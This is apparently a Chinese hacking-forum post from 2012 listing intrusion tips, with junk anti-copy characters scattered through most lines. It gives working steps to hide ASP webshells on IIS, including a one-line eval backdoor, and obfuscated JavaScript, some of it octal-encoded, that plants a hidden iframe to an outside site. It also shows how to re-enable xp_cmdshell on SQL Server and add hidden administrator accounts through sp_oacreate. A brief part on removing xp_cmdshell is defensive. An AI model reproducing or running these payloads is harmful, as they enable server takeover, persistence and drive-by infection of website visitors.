7 G) D: S" L2 }0 K
6 X4 |* ]# E+ q5 ?& O( D; T53、隐藏ASP后门的两种方法
' ^7 P1 X6 V+ d Z1、建立非标准目录:mkdir images..\
) V: b0 w3 l: d+ w0 T拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp0 d0 z9 g3 T: u# R' A; l
通过web访问ASP木马:http://ip/images../news.asp?action=login
8 L0 t" B& X( m$ I1 j如何删除非标准目录:rmdir images..\ /s
( R' \/ l* q) r; T* w W- R2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:, Z# y0 _$ J; e; f
mkdir programme.asp
0 C% E8 f0 f7 g新建1.txt文件内容:<!--#include file=”12.jpg”-->
8 T* B# B9 k1 q( y" z" v新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件# i# g. {( o& m' N5 p5 m B
attrib +H +S programme.asp
! h4 Q2 f- K1 X' i; E" k8 }- n通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt* _+ D) T$ F. ~. k6 F
4 J1 F; q2 S! x0 U4 ~. _8 {54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。/ S4 j$ ?4 |% w- f7 Y, A
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。2 ]+ A8 T+ g: J8 L$ }1 C3 ~
/ F2 B. p) e2 }0 v! N55、JS隐蔽挂马
, S2 k1 B; r6 G; H1./ Q% N5 E. ^& Z* O3 J
var tr4c3="<iframe src=ht";
8 \6 U. x/ R% htr4c3 = tr4c3+"tp:/";+ j+ \( U6 ~2 w3 Z8 i- m
tr4c3 = tr4c3+"/ww";
( h, e6 T4 A1 N2 Jtr4c3 = tr4c3+"w.tr4";3 u) m4 C3 d; ^
tr4c3 = tr4c3+"c3.com/inc/m";
5 t5 B2 `+ I, z$ K0 |tr4c3 = tr4c3+"m.htm style="display:none"></i";9 p7 E% p) n& {
tr4c3 =tr4c3+"frame>'";0 X" v: f, B2 m7 Y# f2 }6 M! ]
document.write(tr4c3);0 E1 I/ i8 e4 E# z& S% _
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
1 a" c8 s. E5 f: Q! {/ |$ d0 o/ d9 h l, d4 ] f
2.
* k% f$ C3 t) J2 @; D1 i- C转换进制,然后用EVAL执行。如0 ^+ M- P/ ^# \8 r7 ?3 p1 ~
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73"); J1 N& Q5 T: A, u& q$ X9 d
不过这个有点显眼。
/ W2 m0 _8 {" \3.% j$ @3 ^* }+ P: j6 U
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');- w# g- h. l8 i- e8 r
最后一点,别忘了把文件的时间也修改下。
$ a5 T% j q j9 r; b/ c' R E0 F8 J( u& L. j9 N1 {
56.3389终端入侵常用DOS命令
$ U n$ J3 W& ]3 S: A5 K4 \- p* gtaskkill taskkill /PID 1248 /t7 \, M' T, N2 |2 }
; p* ^; [0 f) y5 _* Qtasklist 查进程
* z3 ^$ ?; i; i0 o( r( e% _) R; N) i0 |# X* s3 L4 ?* _" _
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
/ n! w- {" ?6 e4 T/ q4 ?iisreset /reboot g4 j3 R+ {' \; U- C, g
tsshutdn /reboot /delay:1 重起服务器) P/ F$ T) [! x& s0 L, i; E
( W- a% K5 d+ ]; flogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,; h4 X. @" ?% Q9 e9 w
" l+ ^! p, f) ^& \( _query user 查看当前终端用户在线情况0 C( s% T" \1 R
* @1 X2 R# F F; y$ k
要显示有关所有会话使用的进程的信息,请键入:query process *. f+ E% m9 x( F
- h& ^4 Q) W9 @. g
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2. v6 J# E6 M* r$ H+ g' `8 G
7 z4 P: y* N( t) D. H( n: g要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
' a& ^! p) ~+ R# [* n% z0 D# [$ w# g; \: f& ]7 `
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02) u- ]* p3 z0 a9 u" m6 \
( D; Y! F( c$ j4 z9 @8 D" ]8 D
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
5 W+ Y1 t5 v: @# p
- R$ R; V1 m" Z9 {7 _, H命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统3 v8 `) r3 L9 a2 [* v! _
- I$ n! q( Z9 C
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。1 L& |: W" R5 k% d I' B$ x
) i5 g1 [3 {$ Y5 f+ ] h命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机 I: V' @7 w( C7 H6 H% b( X2 E
3 e; v5 ^: }7 Q6 [( O; o
56、在地址栏或按Ctrl+O,输入:& p( H/ y& p, U: V' ^
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
/ D# U# H2 H% `% z' v; N9 o4 Y* V/ f+ W6 F. \2 L* M
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。3 j* ~5 n4 n% j5 v
9 u8 O B/ o! ~9 u57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
' r3 ~3 y- g) y+ F1 i用net localgroup administrators是可以看到管理组下,加了$的用户的。
- T+ O$ `$ y, h M* ?8 k+ z
8 W7 H) Y. ]9 ]$ F: K58、 sa弱口令相关命令0 E* @: W$ ~3 e4 o1 \: P$ Y
' u7 p1 v, F; O W1 h) I
一.更改sa口令方法:+ u1 K* R$ x) ? Z
用sql综合利用工具连接后,执行命令:
& {) [; V Z$ ~0 V texec sp_password NULL,'20001001','sa'$ |& ?) b, f; t
(提示:慎用!)
|, C) v: z9 j; {" ~1 @- k: G" Y, c
二.简单修补sa弱口令.
& |! M R6 i! L% T0 ?
. m Z4 P( g% f7 E5 x方法1:查询分离器连接后执行:/ d! T: q/ X, G0 D, ^
if exists (select * from
( O2 A% {' \" Z& I% P+ Ydbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and$ [ A( o: P, @9 n. V/ D/ Q
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
4 ?% c' ~( j( s( x5 q& m
0 ^$ k: m# Z$ H. e- H# cexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'# X9 k8 \2 f! `5 v
! g* N, \7 Y0 e8 ]- FGO
( l) T5 h2 ^/ a7 h# u* {' i
8 v" _# q' k5 P2 x然后按F5键命令执行完毕
) H. G; e1 ~6 r" g; Z& T( h" ^7 m/ i3 S; C7 {# X
方法2:查询分离器连接后# x* u% }* m/ F& U$ X9 F
第一步执行:use master
% _- M$ }( M1 P& X第二步执行:sp_dropextendedproc 'xp_cmdshell'
0 G4 `5 J2 W- f- l7 v然后按F5键命令执行完毕5 P' A1 D, y2 U9 I; j) ]/ Q+ c. ]
' P" B/ H c3 _- B9 \2 {+ M
* o$ d4 | w1 }3 U% ~% ?三.常见情况恢复执行xp_cmdshell.# S; e! S8 l! [( I
4 b4 M7 y8 X6 z
) a. {+ u- K6 ~" w9 D& s$ v2 H1 未能找到存储过程'master..xpcmdshell'.
5 b0 V2 f2 u6 x0 G& v 恢复方法:查询分离器连接后,& A0 d8 r5 |$ B3 B A3 g% q- V; f
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
- P( f1 ]# _/ G# \* I第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'% Z/ B6 E3 M& Q+ n3 T- S) k
然后按F5键命令执行完毕 t) W! ]' @7 k# Z) j9 ?
! Q' e- E, F ?0 O+ u# a" h
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
# F$ A, {# G9 h8 u- _恢复方法:查询分离器连接后,, [9 V+ \0 f3 ^2 T- p
第一步执行:sp_dropextendedproc "xp_cmdshell"
8 }( H2 r/ H$ I* r) h2 C第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'3 D% F: D8 Z/ i; c4 I' N- j
然后按F5键命令执行完毕$ O, D& N. p1 o$ Q
% X9 z1 T% |' t5 p3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
* `% H9 U F! O# X* T恢复方法:查询分离器连接后," H) x/ I0 E2 r! }1 t+ Z2 |
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'# A1 \$ A( H9 l9 _+ a3 @- o) j
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
' x* N" E! a! ^然后按F5键命令执行完毕5 w* K3 w$ z! @
- _+ j' [# }& H
四.终极方法.
& C9 M" e! Y7 H" g0 X( P如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
/ r5 J* C/ x, E6 ~( s2 g查询分离器连接后,
. V% e4 S) ~" c2000servser系统:; R1 f8 m% I8 y- v( d
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
) Q2 @6 _: i6 p n1 M, I4 p! O6 {- s) D. W
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
# L. l! H n, q6 c( M: M6 ^. u8 v) m' k3 e c' q
xp或2003server系统:
' Z! g& f1 d* Z0 u1 Z7 i( B4 l0 y* A2 w& m) U2 P/ H8 k9 L$ ~
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
$ m5 }7 b6 C6 v: Q5 s; C- v0 d: ^8 M; j2 X; {% Z
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'# ?" y& f) C+ _" f8 D
|
发表于 2012-9-15 14:13:15
收藏
支持
反对